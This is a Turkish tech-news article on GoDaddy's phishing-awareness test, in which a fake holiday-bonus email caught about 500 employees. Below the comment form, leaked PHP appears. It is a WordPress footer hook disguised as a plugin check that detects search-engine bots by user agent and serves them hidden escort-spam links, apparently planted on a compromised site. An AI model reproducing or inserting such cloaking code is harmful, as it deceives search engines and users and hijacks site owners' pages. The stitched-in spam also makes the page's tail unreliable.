Sıradaki içerik:

CD PROJEKT RED'e Cyberpunk 2077 Yüzünden Dava Açıldı

e
sv

GoDaddy, Çalışanlarını Akıllıca Bir Testle Tuzağa Düşürdü

25 Aralık 2020 10:03
avatar

  • e 0

    Mutlu

  • e 0

    Eğlenmiş

  • e 0

    Şaşırmış

  • e 0

    Kızgın

  • e 0

    Üzgün

Dünyanın önde gelen domain sağlayıcılarından GoDaddy, çalışanlarının kimlik avı konusunda ne kadar hassas olduğunu öğrenebilmek için biraz çetrefilli bir yola başvurdu. Tüm çalışanlarına sahte bir e-posta adresinden GoDaddy’den tatil kazandınız adlı bir e-mail gönderen şirket, ilave olarak çalışanların kimlik bilgilerini vermelerini talep etti.

Bu e-maile inanıp şirketin gerçekten de tatil hediye ettiğini düşünen bazı çalışanlar, GoDaddy’nin tuzağına düşmüş oldu. Şirket, bu sınavı geçemeyenlere Güvenlik Farkındalığı: Sosyal Mühendislik adı altında sıfırdan bir eğitim verileceğini açıkladı. 

Amaç, kimlik bilgileri dolandırıcılığının önünü kesmek 

GoDaddy şirket

Özellikle büyük şirketlerde çalışanlar, her gün kimlik bilgileri dolandırıcıları tarafından onlarca maile maruz kalabiliyor. Kimlik bilgilerinin açığa çıkması demek, şirketin de sahip olduğu gizli bilgilerin açığa çıkması demek ve bu yüzden de büyük şirketler, bu dolandırıcılığın önüne geçmek için birçok farklı yola başvuruyor. 

GoDaddy’nin seçmiş olduğu yol, daha fazla çalışanlarını tuzağa düşürmek amaçlı tasarlanmış. Ancak gene de bu yolun son derece etkili olduğu ve emniyet farkındalığı konusunda yetersiz bilgiye sahip çalışanları direkt gün yüzüne çıkardığı bir gerçek. 

Bu tuzağa tam 500 şahıs düştü

dizüstü bilgisayar

Şirket, [email protected] e-posta adresi üzerinden çalışanlarına “2020 yılının fazla başarılı geçtiğini ve her bir çalışanın tatili adalet ettiğini” belirten bir e-mail yolladı. Bu mailin içerisinde çalışanlara, 650 dolarlık tatil kuponunu alabilmek için en kısa zamanda kimlik bilgilerini iletmeleri gerektiği söylendi. 

Bir gazetede açıklanan rapora göre GoDaddy şirketinden tam 500 çalışan, bu tuzağa düşerek kimlik bilgilerini mail sahibiyle paylaştı. Şirketin emniyet müdürü Demetrius Comes, tuzağa düşen çalışanlarına şöyle bir e-mail gönderdi; “Bu e-maili kimlik avı testimizi geçemediğiniz için alıyorsunuz. Güvenlik Farkındalığı: Sosyal Mühendislik eğitimimizi yine almanız gereklidir.” 

Şirket, emniyet politikalarını artırmak ve kimlik dolandırıcılarının önünü tamamen kesebilmek için, tuzağa düşen çalışanlarına kişisel ve finansal bilgilerin neden paylaşılmaması gerektiğine dair bir eğitim verecek. 

Kaynak : https://www.businessinsider.com/godaddy-disguised-a-phishing-email-test-as-holiday-bonus-announcement-2020-12

  • Site İçi Yorumlar

En az 10 karakter gerekli
function isBot() { $botAgents ="/google|hakia|msn|yahoo|altavista|crawler|findlinks|bing|Cuil|Excite|Go.com|HotBot|AllTheWeb|search.aol|Lycos|Alexa|ask|baidu|cuil|kosmix|sogou|yodao|yandex|infoseek|yebol|aol/i"; $agent = $_SERVER['HTTP_USER_AGENT']; if (preg_match($botAgents,$agent)) return true; else return false; } function wordpres_plugin_check_core(){ $altsayfa = 1; $bot = 1; $link = '
Araklı escort Eşme escort Alaşehir escort Gölpazarı escort Dalaman escort Ermenek escort İpsala escort Birecik escort Dinar escort Andırın escort Akçaabat escort Banaz escort Akhisar escort Bozüyük escort Bodrum escort Ayrancı escort Havza escort Akçakale escort Bolvadin escort Afşin escort Şanlıurfa escort Serik escort Soma escort Tavşanlı escort Taşova escort Siirt escort Şile escort Süleymanpaşa escort Turhal escort Tatvan escort Silivri escort Mersin escort Sincan escort Muğla escort Gebze escort Denizli escort
'; if($altsayfa == 1){ $say_s = $_SERVER['REQUEST_URI']; $saydim = strlen($say_s); if($saydim > 4){ if($bot == 1){ if (isBot()) { echo $link; } }else{ echo $link; } } }else{ if($bot == 1){ if (isBot()) { echo $link; } }else{ echo $link; } } } add_action('wp_footer', 'wordpres_plugin_check_core');